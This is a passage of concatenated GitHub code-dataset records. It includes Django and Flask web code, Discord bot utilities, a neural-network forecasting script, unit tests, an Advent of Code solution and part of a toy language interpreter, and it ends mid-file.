@ExportMethod(DjangoStruct('Contestant'), [DjangoId('Contest'), DjangoId('Role')], PCOr(PCTokenUser('user'), PCArg('self', 'MANAGE')))\n def find_contestant(self, user):\n try:\n return Contestant.objects.get(contest=self, children__id=user.id)\n except Contestant.DoesNotExist:\n try:\n return Contestant.objects.get(contest=self, id=user.id)\n except Contestant.DoesNotExist:\n return None\n\n @ExportMethod(DjangoStruct('Contestant'), [DjangoId('Contest')], PCAnd(PCTokenIsUser(), PCArg('self', 'APPLY')), [AlreadyRegistered])\n def join(self):\n return Contestant.create(fields=ContestantStruct(contest=self, accepted=bool(Privilege.demand(self, 'JOIN'))), user_list=[token_container.token.user])\n\n @ExportMethod(NoneType, [DjangoId('Contest'), DjangoId('User')], PCArg('self', 'MANAGE'))\n def add_admin(self, user):\n contestant = self.find_contestant(user)\n if contestant is None:\n contestant = Contestant.create(fields=ContestantStruct(contest=self, accepted=True, invisible=True), user_list=[user])\n else:\n contestant.modify(fields=ContestantStruct(accepted=True, invisible=True))\n self.admin_role.add_member(contestant)\n self.changed_contestants()\n\n @ExportMethod(NoneType, [DjangoId('Contest'), DjangoId('Role')], PCArg('self', 'MANAGE'))\n def delete_admin(self, role):\n contestant = self.find_contestant(role)\n if contestant is not None:\n self.admin_role.delete_member(contestant)\n contestant.modify(fields=ContestantStruct(invisible=False))\n\nclass ContestEvents(Events):\n model = Contest\n on_insert = on_update = ['name']\n on_delete = []\n","repo_name":"TFKls/satori-git","sub_path":"satori.core/satori/core/entities/Contest.py","file_name":"Contest.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"6949606785","text":"import nextcord as discord\nfrom nextcord.ext import commands\nimport re\nimport json\n\n\ndef clean_code(content) -> str:\n if content.startswith(\"```\") and content.endswith(\"```\"):\n return \"\\n\".join(content.split(\"\\n\")[1:])[:-3]\n return content\n\n\ndef read_json(file) -> dict:\n with open(f\"{file}\", \"r\") as f:\n data = json.load(f)\n return data\n\n\ndef write_json(file, data):\n with open(file, \"w\") as f:\n json.dump(data, f, indent=4)\n\n\ntime_regex = re.compile(\"(?:(\\d{1,5})(h|s|m|d))+?\")\ntime_dict = {\"h\": 3600, \"s\": 1, \"m\": 60, \"d\": 86400}\n\n\nclass TimeConverter(commands.Converter):\n async def convert(self, ctx, argument):\n args = argument.lower()\n matches = re.findall(time_regex, args)\n time = 0\n for key, value in matches:\n try:\n time += time_dict[value] * float(key)\n except KeyError:\n raise commands.BadArgument(f\"{value} is an invalid time key\")\n except ValueError:\n raise commands.BadArgument(f\"{key} is not a number\")\n return time\n\n\nclass walbankconverter(commands.Converter):\n async def convert(self, ctx: commands.Context, argument: str):\n if argument.lower() == \"wallet\":\n arg = argument.lower()\n elif argument.lower() == \"bank\":\n arg = argument.lower()\n else:\n raise commands.BadArgument(\n \"Didn't specify whether it was wallet or bank properly\"\n )\n\n return arg\n\n\nclass statusconverter(commands.Converter):\n async def convert(self, ctx, argument: str):\n if argument.lower() == \"idle\":\n return discord.Status.idle\n elif argument.lower() == \"dnd\" or argument.lower() == \"do not disturb\":\n return discord.Status.dnd\n elif argument.lower() == \"invisible\":\n return 
discord.Status.invisible\n elif argument.lower() == \"online\":\n return discord.Status.online\n else:\n raise commands.BadArgument(\"Didn't specify the status properly\")\n","repo_name":"cuberiser/speedcuber-py","sub_path":"utilities/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"2222066281","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom models import BPNN\nfrom data_process import sequence_create, sequence_split, sequence_load, sequence_aug\nfrom metrics.regression_metrics import get_mae, get_mse, get_mape, get_rmse, get_r2\n\"\"\"\n方法:BPNN\n策略:单模型多输出\n\"\"\"\n\nif __name__ == '__main__':\n # 设置随机种子\n np.random.seed(0)\n\n # == == == == == == == == == 制造模型需要的数据 == == == == == == == == ==\n\n # 加载数据\n data_origin = sequence_load.load_data(' ')\n train_data, test_data = sequence_split.train_test_split(data_origin)\n # print(train_data.shape)\n\n # 归一化\n train_data_normalized, scaler = sequence_aug.normalize(train_data.reshape(-1, 1), method='-1-1')\n test_data_normalized = scaler.transform(test_data.reshape(-1, 1))\n # print(train_data_normalized[:5])\n\n # 制造训练集序列及对应标签\n \"\"\"\n 【注】\n\n 1. 输入时间窗步长一般大于预测步长\n 2. 若利用训练集最后的时间窗预测测试集初始部分,则必须满足 输入步长>预测步长,以防止训练集渗入测试集作弊\n 3. 故本代码训练集最后一个时间窗步长数据不参与训练 \n \"\"\"\n history_size = 24 # 输入时间窗步长\n predict_size = 24 # 预测步长\n\n # 训练序列最后一个时间窗步长数据不参与训练\n train_real_normalized = train_data_normalized[:-history_size]\n\n # 测试序列前面增加训练序列的最后一个时间窗步长数据\n test_real_normalized = np.concatenate(\n (train_data_normalized[-history_size:], test_data_normalized))\n\n train_inout_seq = sequence_create.create_inout_train(train_real_normalized, history_size, predict_size)\n # train_inout_seq = shuffle(train_inout_seq, random_state=1) # 每次运行 shuffle 函数得到打乱后的结果都是相同的\n train_x, train_y = train_inout_seq[:, :-predict_size], train_inout_seq[:, -predict_size:]\n test_inout_seq = sequence_create.create_inout_test(test_real_normalized, history_size, predict_size)\n test_x, test_y = test_inout_seq[:, :-predict_size], test_inout_seq[:, -predict_size:]\n\n # 样本数量\n train_data_num = len(train_x)\n test_data_num = len(test_x) # 数量应该等于len(train_data_normalized)\n\n # == == == == == == == == == 搭建模型 == == == == == == == == ==\n\n # 实例化网络模型\n bp_mlp = BPNN.bp_model()\n\n # == == == == == == == == == 模型训练 == == == == == == == == ==\n bp_fit = bp_mlp.fit(train_x, train_y)\n\n # == == == == == == == == == 模型预测 == == == == == == == == ==\n # 训练集\n train_predict = bp_fit.predict(train_x)\n # print(train_predict)\n train_predict = scaler.inverse_transform(train_predict.reshape(-1, 1)) # 逆归一化\n # 测试集\n test_predict = bp_fit.predict(test_x)\n test_predict = scaler.inverse_transform(test_predict.reshape(-1, 1)) # 逆归一化\n\n # == == == == == == == == == == 数据索引 == == == == == == == == == ==\n\n data_number_index = np.arange(0, len(data_origin), 1) # 数字索引,非时间索引\n test_number_index = data_number_index[len(data_origin) - test_data_num*predict_size:]\n output = pd.DataFrame(test_predict)\n output.to_csv(' ')\n\n # == == == == == == == == == 预测误差评价指标 == == == == == == == == ==\n\n # 平均绝对误差(MAE)\n print('---------评估指标--------')\n mae = get_mae(data_origin[test_number_index], test_predict)\n print('MAE:{}'.format(mae))\n # 平均绝对百分比误差(MAPE)\n mape = get_mape(data_origin[test_number_index], test_predict) * 100\n print('MAPE:{}%'.format(mape))\n # 均方误差(MSE)\n mse = get_mse(data_origin[test_number_index], test_predict)\n 
print('MSE:{}'.format(mse))\n # 均方根误差(RMSE)\n rmse = get_rmse(data_origin[test_number_index], test_predict)\n print('RMSE:{}'.format(rmse))\n # 判别系数R^2\n r2 = get_r2(data_origin[test_number_index], test_predict)\n print('R^2:{}'.format(r2))\n\n # == == == == == == == == == == 绘图 == == == == == == == == == ==\n\n plt.plot(test_number_index, data_origin[test_number_index], 'b', label='real')\n plt.plot(test_number_index, test_predict, 'y-', label='prediction')\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()\n","repo_name":"ahu-dsp/Top-oil-temperature-forcast-code","sub_path":"neural networks/algorithms/bpnn_multiple_outputs.py","file_name":"bpnn_multiple_outputs.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70937276477","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom.views import (AccountList,AccountUpdate,AccountDelete,AccountDetail,\nAccountCreate)\n\n\n\nurlpatterns = [\n url(r'^$', AccountList.as_view(), name='account'),\n url(r'^(?P\\d+)/$', AccountDetail.as_view(), name='detail'),\n url(r'^edit/(?P\\d+)/$', AccountUpdate.as_view(), name='edit'),\n url(r'^delete/(?P\\d+)/$', AccountDelete.as_view(), name='delete'),\n url(r'^create/$', AccountCreate.as_view(), name='create'),\n\n]\n","repo_name":"kais2503/Gsource","sub_path":"src/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"70447536316","text":"import gevent\nimport socket\nimport unittest\nimport msgpack\n\nfrom circus import g\n\n\ndef get_free_ports(num, host=None):\n if not host:\n host = '127.0.0.1'\n sockets = []\n ret = []\n for i in xrange(num):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((host, 0))\n ret.append(s.getsockname()[1])\n sockets.append(s)\n for s in sockets:\n s.close()\n return ret\n\n\nclass DealerTest(unittest.TestCase):\n def test_simple(self):\n port, = get_free_ports(1)\n router = g.Router(port, api=lambda x: x)\n dealer = g.Dealer(port)\n self.assertEqual(dealer.send('hi'), 'hi')\n\n def test_timeout(self):\n def sleepy(x):\n gevent.sleep(0.2)\n return x\n port, = get_free_ports(1)\n router = g.Router(port, api=sleepy)\n dealer = g.Dealer(port, timeout=0.1)\n self.assertRaises(g.TimeoutException, dealer.send, 'hi')\n gevent.sleep(0.3)\n\n\nclass PushTest(unittest.TestCase):\n def test_simple(self):\n port, = get_free_ports(1)\n class C(object):\n def __call__(self, message):\n self.message = message\n return 'foo'\n api = C()\n pull = g.Pull(port, api=api)\n push = g.Push(port)\n self.assertEqual(push.send('hi'), None)\n gevent.sleep(0.001)\n self.assertEqual(api.message, 'hi')\n\n\nclass APITest(unittest.TestCase):\n def test_dealer(self):\n class Echo(object):\n def remote_echo(self, message):\n return message\n port, = get_free_ports(1)\n server = g.APIServer(g.Router(port), api=Echo())\n client = g.APIClient(g.Dealer(port))\n self.assertEqual(client.echo('hi'), 'hi')\n\n def test_push(self):\n class Metrics(object):\n def __init__(self):\n self.x = 0\n def remote_incr(self, delta):\n self.x += delta\n metrics = Metrics()\n port, = get_free_ports(1)\n server = g.APIServer(g.Pull(port), api=metrics)\n client = g.APIClient(g.Push(port))\n self.assertEqual(client.incr(3), None)\n gevent.sleep(0.001)\n self.assertEqual(metrics.x, 3)\n del client\n 
gevent.sleep(0.001)\n\n","repo_name":"cablehead/circus","sub_path":"circus/test/test_g.py","file_name":"test_g.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23274070946","text":"import os\nimport argparse\nimport scipy.stats as st\n\nfrom .. import params as P\nfrom . import utils\n\n# This is a utility script that takes a path to a desired result folder, reads the results saved in this\n# folder, and then computes convergence epochs for a given metric used in the training process.\ndef run_dispconv(path, crit, lb, seeds, ci_levels, convthresholds):\n\tfor ct in convthresholds:\n\t\tprint(str(100*ct) + \"% CONVERGENCE THRESHOLD\" )\n\t\tprint(\"ITER, RESULT\")\n\t\tvalues = []\n\t\tfor id in seeds:\n\t\t\tcheckpoint_folder = os.path.join(path, 'iter' + str(id), 'checkpoints')\n\t\t\tcheckpoint_list = utils.get_checkpoint_list(checkpoint_folder)\n\t\t\tcheckpoint_id = max(checkpoint_list)\n\t\t\tcheckpoint_file_path = os.path.join(checkpoint_folder, \"checkpoint\" + str(checkpoint_id) + \".pt\")\n\t\t\tloaded_checkpoint = utils.load_dict(checkpoint_file_path)\n\t\t\tseries = loaded_checkpoint['val_result_data'][loaded_checkpoint['crit_names'].index(crit)]\n\t\t\tbest_res = max(series)\n\t\t\tconv_epoch = 0\n\t\t\thb = not lb\n\t\t\tfor i in range(len(series)):\n\t\t\t\tif utils.is_converged(series[i], best_res, ct, hb):\n\t\t\t\t\tconv_epoch = i\n\t\t\t\t\tbreak\n\t\t\tvalues.append(conv_epoch)\n\t\t\tprint(str(id) + \", \" + str(conv_epoch))\n\t\tavg = sum(values)/len(values)\n\t\tse = st.sem(values)\n\t\tprint(\"AVG, \" + str(avg))\n\t\tfor ci_lvl in ci_levels:\n\t\t\tci = st.t.interval(ci_lvl, len(values) - 1, loc=avg, scale=se)\n\t\t\tci_str = \"+/- \" + str((ci[1] - ci[0])/2)\n\t\t\tprint(str(ci_lvl*100) + \"% CI, \" + ci_str)\n\t\t\t\n\nif __name__ == '__main__':\n\t# Parse command line arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--path', default=P.DEFAULT_DISPCONV_PATH, help=\"Path to the csv file you want to examine.\")\n\tparser.add_argument('--crit', default=P.DEFAULT_CRIT, help=\"Name of criterion you want to evaluate.\")\n\tparser.add_argument('--lb', action='store_true', default=P.DEFAULT_DISPCONV_LB, help=\"Pass this flag if you want to evaluate a lower-is-better criterion (False by default).\")\n\tparser.add_argument('--seeds', nargs='*', default=P.DEFAULT_SEEDS, type=int, help=\"The RNG seeds of the experiments you want to examine.\")\n\tparser.add_argument('--ci', nargs='*', default=P.DEFAULT_CI_LEVELS, type=float, help=\"Confidence interval levels you want to report.\")\n\tparser.add_argument('--convthresholds', nargs='*', default=P.DEFAULT_CONVTHRESHOLDS, type=float, help=\"Convergence threshold levels you want to report.\")\n\targs = parser.parse_args()\n\t\n\trun_dispconv(path=args.path, crit=args.crit, lb=args.lb, seeds=args.seeds, ci_levels=args.ci, convthresholds=args.convthresholds)","repo_name":"GabrieleLagani/HebbianLearning","sub_path":"neurolab/utils/dispconv.py","file_name":"dispconv.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"96"} +{"seq_id":"41394777119","text":"from main import Circuit\n\ninout = {\n 'inputs': ['a','b','c','d'],\n 'outputs': ['out', 'out1']\n}\n\nmyCirc = Circuit(inout)\nmyCirc.addANDgate('node1', ['a','b'])\nmyCirc.addANDgate('node2', ['c','d'])\nmyCirc.addORgate('out1', ['node1', 
'node2'])\nmyCirc.addANDgate('out2', ['node1', 'node2'])\n\n\ninputs = [[1,1,1,1],[1,0,0,1],[0,0,1,1],[1,0,1,0],[1,0,0,0]]\n\nresult = myCirc.Run(inputs, ['out1','out2'], time_step = 5, order=['a','b','c','d'])\n#print(result)\n#print(myCirc.result)\nmyCirc.plot()\n","repo_name":"alifele/Python","sub_path":"PyGic/source_code/example1.py","file_name":"example1.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20588947915","text":"# Creación de una cadena\nstring = \"Hola, mundo\"\n\n# Obtener la longitud de la cadena\nlength = len(string)\n# Resultado: 11\n\n# Acceder a caracteres individuales\nchar = string[0]\n# Resultado: \"H\"\n\n# Rebanado (slicing) de cadenas\nsubstring = string[0:4]\n# Resultado: \"Hola\"\n\n# Concatenación de cadenas\nconcatenated = string + \"!\"\n# Resultado: \"Hola, mundo!\"\n\n# Repetición de cadenas\nrepeated = string * 3\n# Resultado: \"Hola, mundoHola, mundoHola, mundo\"\n\n# Buscar y reemplazar\nreplaced = string.replace(\"mundo\", \"Python\")\n# Resultado: \"Hola, Python\"\n\n# Convertir a mayúsculas y minúsculas\nuppercase = string.upper()\n# Resultado: \"HOLA, MUNDO\"\nlowercase = string.lower()\n# Resultado: \"hola, mundo\"\n\n# Eliminar espacios en blanco al principio y al final\nstripped = \" Cadena con espacios \".strip()\n# Resultado: \"Cadena con espacios\"\n\n# Dividir una cadena en una lista de subcadenas\nparts = string.split(\",\")\n# Resultado: [\"Hola\", \" mundo\"]\n\n# Unir una lista de subcadenas en una cadena\njoined = \"-\".join(parts)\n# Resultado: \"Hola- mundo\"\n\n# Buscar la posición de una subcadena\nindex = string.index(\"mundo\")\n# Resultado: 6\n\n# Comprobar si una cadena comienza o termina con una subcadena\nstartsWith = string.startswith(\"Hola\")\n# Resultado: True\nendsWith = string.endswith(\"mundo\")\n# Resultado: True\n\n# Comprobar si la cadena contiene solo caracteres alfabéticos o numéricos\nisAlphaNumeric = string.isalnum()\n# Resultado: False\n\n# Comprobar si la cadena contiene solo caracteres alfabéticos\nisAlpha = string.isalpha()\n# Resultado: False\n\n# Contar ocurrencias de una subcadena en la cadena\ncount = string.count(\"o\")\n# Resultado: 2\n\n# Formateo de cadenas\nformatted = \"Hola, {}!\".format(\"Python\")\n# Resultado: \"Hola, Python!\"\n\n# F-strings (cadenas formateadas)\nname = \"Python\"\nformatted = f\"Hola, {name}!\"\n# Resultado: \"Hola, Python!\"\n\n# Remover y reemplazar espacios en blanco\nstripped = \" Cadena con espacios \".strip()\nreplaced = \"Texto con espacios\".replace(\" \", \"-\")\n\n# Partir en líneas\nlines = \"Línea 1\\nLínea 2\".split(\"\\n\")\n\n# Verificar si la cadena contiene una subcadena\ncontains = \"Python\" in string\n# Resultado: False\n\n# Obtener el código Unicode de un carácter\nunicode = ord(\"A\")\n# Resultado: 65\n\n# Convertir código Unicode a carácter\nchar = chr(65)\n# Resultado: \"A\"\n","repo_name":"Osmait/Practice-in-programin-language","sub_path":"Python/algoritms/basic/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"38117749137","text":"from flask import Blueprint, request\nfrom . 
import db\nfrom .models import Jumia\nfrom flask_cors import CORS\n\napi = Blueprint('api', __name__)\n\nCORS(api)\n\n# Endpoint to query db\n@api.route('/query_db', methods=['POST'], strict_slashes=False)\ndef query_db():\n name = request.json['input']\n\n products_list = Jumia.query.all()\n products = []\n\n for product in products_list:\n if name.lower() in product.name.lower():\n products.append({'store': 'Jumia', 'name': product.name, 'price': product.price, \n 'product_url': product.product_url, 'img_url': product.img_url})\n \n\n return {'products' : products} \n\n# Endpoint to update db\n@api.route('/add_products', methods=['POST'])\ndef add_products():\n product_data = request.get_json()\n\n new_products = Jumia(category=product_data['category'], name=product_data['name'], price=product_data['price'], \n product_url=product_data['product_url'], img_url=product_data['img_url'])\n\n db.session.add(new_products)\n db.session.commit\n\n return 'Done',201\n\n# Endpoint to Get Products from db\n@api.route('/products', methods=['GET'])\ndef product():\n products_list = Jumia.query.all()\n products = []\n\n for product in products_list:\n products.append({'store': 'Jumia', 'name': product.name, 'price': product.price, \n 'product_url': product.product_url, 'img_url': product.img_url})\n \n\n return {'products' : products}","repo_name":"charbelMK/price_comparison_website","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"73035283835","text":"#!/usr/bin/env python3\n\nimport math\n\ninput = \"../input/2020/day13.txt\"\n\nwith open(input) as file:\n now = int(file.readline())\n buses = [int(b) for b in filter(\n lambda b: not b.startswith('x'), file.readline().split(','))]\nfirst = 1_000_000_000\nbus = 0\nfor b in buses:\n next = ((now // b) + 1) * b\n if next < first:\n first = next\n bus = b\n\nprint(\"Part 1:\", (first - now) * bus)\n\n\nwith open(input) as file:\n file.readline()\n buses = list(enumerate(file.readline().split(',')))\n buses = [(-i, int(b))\n for i, b in filter(lambda b: not b[1].startswith('x'), buses)]\n\n\ndef mul_inv(a, b):\n b0 = b\n x0 = 0\n x1 = 1\n while a > 1:\n q = a // b\n t = b\n b = a % b\n a = t\n t = x0\n x0 = x1 - q * x0\n x1 = t\n if x1 < 0:\n x1 += b0\n return x1\n\n\ndef part2(buses):\n prod = math.prod([b for i, b in buses])\n sum = 0\n\n for i, b in buses:\n p = prod // b\n sum += i * mul_inv(p, b) * p\n\n return sum % prod\n\n\nprint(\"Part 2:\", part2(buses))\n","repo_name":"bpa/advent-of-code","sub_path":"2020/script/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"70960464957","text":"import pyscannerbit.scan as sb\nimport matplotlib.pyplot as plt\n\n# Test function\ndef test_logl(x,y,z):\n return -0.5*( (x-10)**2 + (y-15)**2 + (z+3)**2 ) # fitness function to maximise (log-likelihood)\n\n# Override some scanner settings (this is a little ugly for now)\n# Can make it a little nicer with defaultdict and some recursion\nfrom collections import defaultdict\ndef rec_dd():\n return defaultdict(rec_dd)\nsettings = rec_dd() # Uses a new dict as default value when accessing non-existant keys\nsettings[\"Scanner\"][\"scanners\"][\"multinest\"] = {\"tol\": 0.5, \"nlive\": 500} # Configured for quick and dirty scan \n\n# Create scan manager object\nmyscan = sb.Scan(test_logl, bounds=[[1., 40.]] * 3, prior_types=[\"log\", \"flat\", \"log\"], scanner=\"multinest\", settings=settings)\nmyscan.scan()\n\n# Retrieve h5py group object, augmented with some helpful routines\nhdf5 = myscan.get_hdf5()\n\n# Variable names always match the ones used in \"loglike\"\nprint(hdf5.get_param_names())\n\n# Best-fit parameters\nprint(hdf5.get_best_fit(\"x\"))\nprint(hdf5.get_best_fit(\"y\"))\nprint(hdf5.get_best_fit(\"z\"))\nprint(hdf5.get_min_chi_squared())\n\n# np.array of parameter\nprint(hdf5.get_param(\"z\"))\nprint(hdf5.get_loglike())\n\n# Plot pairs of parameters\nhdf5.make_plot(\"x\", \"y\")\nhdf5.make_plot(\"x\", \"LogLike\")\n\n# Plot profile likelihood (requires an axis)\nfig = plt.figure(figsize=(12,4))\nax = fig.add_subplot(121)\nhdf5.plot_profile_likelihood(ax,\"x\",\"y\")\nax = fig.add_subplot(122)\nhdf5.plot_profile_likelihood(ax,\"x\",\"z\")\nplt.tight_layout()\nfig.savefig(\"scan_object_test_logl.png\")\n\n# This is still an HDF5-like object (with the root being the group containing the datasets for this scan) \n# e.g., you can do\nprint(hdf5[\"default::x\"])\n\n","repo_name":"bjfar/pyscannerbit","sub_path":"tests/scan_object_test.py","file_name":"scan_object_test.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
{"seq_id":"22599553340","text":"import zai.ast_nodes as ast_nodes\nfrom zai.tokens import TokType\nfrom zai.internal_error import InternalRuntimeError\nfrom zai.env import EnvironmentStack, Scope\nfrom zai.lexer import Lexer\nfrom zai.parse import Parser\nfrom zai.utils import is_truthy, read_module_contents\nfrom zai.objects import (\n FloatObject,\n ObjectType,\n BoolObject,\n NilObject,\n IntObject,\n FuncObject,\n StringObject,\n ReturnObject,\n ClassDefObject,\n ClassInstanceObject,\n ContinueObject,\n BreakObject,\n ArrayObject,\n ModuleObject,\n)\n\n\nclass Visitor:\n def __init__(self, environment):\n \"\"\"\n Class implementing the visitor pattern which is used to evaluate\n language structures.\n \"\"\"\n self.env = environment\n\n def visit(self, ast_root):\n \"\"\"\n Main entry point for all AST roots.\n \"\"\"\n return ast_root.accept(self)\n\n def visit_program(self, node):\n for stmnt in node.stmnts:\n ret_val = stmnt.accept(self)\n\n if ret_val is not None and ret_val.obj_type in [\n ObjectType.RETURN,\n ObjectType.BREAK,\n ObjectType.CONTINUE,\n ]:\n if ret_val.obj_type == ObjectType.RETURN:\n msg = '\"return\" statement not used outside of a function or class' \"method!\"\n raise InternalRuntimeError(msg)\n elif ret_val.obj_type == ObjectType.BREAK:\n msg = '\"break\" statement not used within a loop or a switch block!'\n raise InternalRuntimeError(msg)\n elif ret_val.obj_type == ObjectType.CONTINUE:\n msg = '\"continue\" statement not used within a loop!'\n raise InternalRuntimeError(msg)\n # else:\n # return ret_val\n\n def visit_float(self, node):\n return FloatObject(node.val)\n\n def visit_int(self, node):\n return IntObject(node.val)\n\n def visit_symbol(self, node):\n # Retrieve symbol from env\n curr_scope = self.env.peek()\n symbol_val = curr_scope.get_variable(node.val)\n\n if symbol_val is None:\n err_msg = 'Variable \"{}\" is not defined!.'.format(node.val)\n raise InternalRuntimeError(err_msg)\n else:\n return symbol_val\n\n def visit_string(self, node):\n return StringObject(node.val)\n\n def visit_bracket(self, node):\n return node.expr.accept(self)\n\n def visit_bool(self, node):\n if node.val == TokType.TRUE:\n return 
BoolObject(True)\n else:\n return BoolObject(False)\n\n def visit_arith(self, node):\n # Evaluate left and right sides\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n # Perform actions depeding on type\n if node.op == TokType.PLUS:\n return left + right\n elif node.op == TokType.MINUS:\n return left - right\n elif node.op == TokType.MUL:\n return left * right\n elif node.op == TokType.DIV:\n return left / right\n\n def visit_logic(self, node):\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n # >\n if node.op == TokType.AND:\n return left & right\n # >=\n elif node.op == TokType.OR:\n return left | right\n\n def visit_relop(self, node):\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n # >\n if node.op == TokType.GT:\n return left > right\n # >=\n elif node.op == TokType.GTE:\n return left >= right\n # <\n elif node.op == TokType.LT:\n return left < right\n # <=\n elif node.op == TokType.LTE:\n return left <= right\n\n def visit_eq(self, node):\n left = node.left.accept(self)\n right = node.right.accept(self)\n\n if node.op == TokType.EQ:\n return left == right\n elif node.op == TokType.NEQ:\n return left != right\n\n def visit_unary(self, node):\n result = node.value.accept(self)\n if node.op == TokType.MINUS:\n return -result\n elif node.op == TokType.BANG:\n return ~result\n\n def visit_if(self, node):\n # Evaluate each condition and execute block if it is true\n for condition in node.condition_blocks:\n cond_value = condition.test_condition.accept(self)\n if is_truthy(cond_value):\n return condition.body.accept(self)\n\n if node.else_block is not None:\n return node.else_block.accept(self)\n\n def visit_while(self, node):\n cond_value = node.condition.accept(self)\n while is_truthy(cond_value):\n # Detect any usage of return\n ret_val = node.body.accept(self)\n if ret_val is not None:\n # Exit loop early using return\n if ret_val.obj_type == ObjectType.BREAK:\n return\n # There is no need to do anything here. 
We need to reevaluate the test\n # condition for the loop.\n elif ret_val.obj_type == ObjectType.CONTINUE:\n continue\n # \"return\" value is floated up\n else:\n return ret_val\n cond_value = node.condition.accept(self)\n\n def visit_print(self, node):\n print_value = node.expr.accept(self)\n print(str(print_value))\n\n def _replace_assign_local(self, name, value):\n if isinstance(name, ast_nodes.SymbolNode):\n value = value.accept(self)\n scope = self.env.peek()\n\n if scope.get_variable(name.val) is None:\n scope.initialize_variable(name.val, value)\n else:\n msg = \"Variable {} is not initialized!\".format(name.val)\n InternalRuntimeError(msg)\n elif isinstance(name, ast_nodes.ArrayAccessNode):\n pass\n\n def _replace_assign_call(self, name, val):\n pass\n\n def _replace_assign_nested(self, name, val):\n pass\n\n def visit_replace_assign(self, node):\n symbol_namespace = None\n symbol_name = None\n new_value = node.value.accept(self)\n if node.symbol_path is not None:\n symbol_namespace = node.symbol_path.accept(self)\n else:\n symbol_namespace = self.env.peek()\n\n if isinstance(node.symbol_name, ArrayAccessNode):\n symbol_name = node.symbol_name.array_name.val\n array_index = node.symbol_name.array_pos.accept(self)\n if array_index.obj_type != ObjectType.INT:\n err_msg = 'Array cannot be \"{}\" !'.format(array_index.obj_type)\n raise InternalRuntimeError(err_msg)\n\n array_instance = symbol_namespace.get_variable(symbol_name)\n if array_instance is None:\n err_msg = ('The array \"{}\" does not exist within the current' \"environment!\").format(symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n if array_index.value < array_instance.size:\n array_instance.elements[array_index.value] = new_value\n else:\n err_msg = '\"{}\" exceeds the length of the array \"{}\"!'.format(array_index.value, symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n symbol_name = node.symbol_name.val\n if isinstance(symbol_namespace, Scope):\n status = symbol_namespace.replace_variable(symbol_name, new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it has not' \"been initialized!\").format(\n symbol_name\n )\n raise InternalRuntimeError(err_msg)\n elif symbol_namespace.obj_type in [\n ObjectType.MODULE,\n ObjectType.CLASS_INSTANCE,\n ]:\n status = symbol_namespace.namespace.replace_variable(symbol_name, new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it has not' \"been initialized!\").format(\n symbol_name\n )\n raise InternalRuntimeError(err_msg)\n\n def _new_assign_local(self, name, value):\n scope = self.env.peek()\n\n if not scope.is_initialized(name.val):\n value = value.accept(self)\n scope.initialize_variable(name.val, value)\n else:\n # TODO: Raise Runtime Error\n print(\"Variable abc is already initialized\")\n\n def _new_assign_call(self):\n # TODO: Runtime Error\n print(\"Cannot assign to function call\")\n\n def _new_assign_nested(self, path, name, value):\n symbol_path = path.accept(self)\n if isinstance(symbol_path, Scope):\n symbol_path.initialize_variable(name.val, value)\n elif symbol_path.obj_type in [ObjectType.MODULE, ObjectType.CLASS_INSTANCE]:\n symbol_path.namespace.initialize_variable(name.val, value)\n\n def visit_new_assign(self, node):\n if isinstance(node.name, ast_nodes.CallNode):\n return self._new_assign_call()\n elif isinstance(node.name, (ast_nodes.SymbolNode, ast_nodes.ArrayAccessNode)):\n if node.path is None:\n self._new_assign_local(node.name, node.value)\n else:\n 
self._new_assign_nested(node.path, node.name, node.value)\n else:\n print(\"This should not happen.\")\n\n def visit_scope_block(self, node):\n # Create a new scope to evaluate the current block in\n parent_env = self.env.peek()\n self.env.enter_scope(parent_env)\n for stmnt in node.stmnts:\n ret_val = stmnt.accept(self)\n # Bubble up any flow statements\n if ret_val is not None and ret_val.obj_type in [\n ObjectType.RETURN,\n ObjectType.BREAK,\n ObjectType.CONTINUE,\n ]:\n self.env.exit_scope()\n return ret_val\n\n self.env.exit_scope()\n\n def visit_switch(self, node):\n # Evaluate the condition used for testing all cases\n test_cond = node.switch_cond.accept(self)\n\n # Find the index of the first switch case which is true.\n start_case_idx = None\n for idx, switch_case in enumerate(node.switch_cases):\n case_cond = switch_case[0].accept(self)\n if is_truthy(case_cond == test_cond):\n start_case_idx = idx\n break\n\n # Execute all switch cases after that until we encounter a \"break\" keyword\n # or a \"return\"/\"continue\" 